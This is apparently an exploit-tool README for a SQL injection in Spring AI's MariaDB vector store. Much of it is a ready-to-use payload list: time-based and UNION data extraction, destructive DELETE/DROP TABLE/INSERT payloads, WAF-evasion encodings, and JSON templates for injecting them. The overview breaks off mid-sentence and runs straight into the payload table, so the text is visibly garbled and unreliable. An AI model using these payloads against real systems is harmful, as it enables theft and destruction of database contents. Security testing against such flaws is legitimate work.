## https://sploitus.com/exploit?id=917D955E-0051-5045-96F6-8FE35F3C8D66
CVE-2026-22730 Scanner & Exploit – Spring AI MariaDB Vector Store SQL Injection
https://img.shields.io/badge/python-3.6%252B-blue
https://img.shields.io/badge/license-MIT-green
https://img.shields.io/badge/status-stable-brightgreen
A professional security assessment tool for CVE-2026-22730 – a critical SQL injection vulnerability discovered in Spring AI's MariaDB vector store. This tool allows authorised penetration testers and security researchers to detect and safely exploit the vulnerability for educational or defensive purposes.
📖 Overview
CVE-2026-22730 affects Spring AI versions 1.0.x 64 -- Checks first character of database name.
' AND (SELECT COUNT(*) FROM information_schema.tables) > 10 -- Checks number of tables.
' OR (SELECT 1 FROM users LIMIT 1) = 1 -- Tests existence of a table.
6. Write / Delete Operations
Destructive payloads (use with extreme caution).
Payload Description
' OR '1'='1 When used with DELETE, removes all rows.
' OR 1=1; DROP TABLE vector_store -- Attempts to drop the entire table (requires stacked queries, often disabled).
' OR 1=1; INSERT INTO vector_store (content) VALUES ('hacked') -- Attempts to insert new data.
7. Bypass Filters / WAF
Obfuscated versions to evade simple pattern matching.
Payload Description
%27%20OR%20SLEEP(5)%20-- URL‑encoded (script handles this automatically).
' /**/OR/**/SLEEP(5)/**/-- Inline comments to break up keywords.
' OR 0x273d27=0x273d27 -- Hex‑encoded comparison ('=').
' OR 1=1 /*!50000SLEEP(5)*/ -- MySQL version‑specific comment.
8. Specific Payloads from the CVE Advisory
Payload Description
' OR '1'='1 Used to retrieve all documents (proof of concept).
' OR SLEEP(5) -- Time‑based detection payload used in the scanner.
' OR '1'='1 Also used for the DELETE injection.
📝 Example JSON Templates with Payload
json
{"department": "' OR SLEEP(5) --"}
{"department": "' OR '1'='1"}
{"department": "' UNION SELECT 1, content, metadata FROM vector_store --"}
In the script, you would pass the template as:
bash
--json-template '{"department": "__PAYLOAD__"}'
**The script will replace __PAYLOAD__ with the actual payload.**